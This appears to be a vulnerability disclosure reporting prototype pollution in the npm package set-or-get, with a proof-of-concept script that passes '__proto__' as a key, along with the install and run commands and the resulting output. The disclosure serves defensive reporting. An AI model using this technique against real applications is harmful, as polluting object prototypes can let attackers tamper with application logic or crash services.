Prototype Pollution in ionicabizau/set-or-get.js
Valid
Reported on
Dec 17th 2020
Description
set-or-get
is vulnerable to Prototype Pollution
.
Proof of Concept
- Create the following PoC file:
// poc.js
var SetOrGet = require("set-or-get");
var obj = {}
console.log("Before : " + {}.polluted);
SetOrGet(obj, "__proto__", {}).polluted ='Yes! Its Polluted';
console.log("After : " + {}.polluted);
- Execute the following commands in terminal:
npm i set-or-get # Install affected module
node poc.js # Run the PoC
- Check the Output:
Before : undefined
After : Yes! Its Polluted
to join this conversation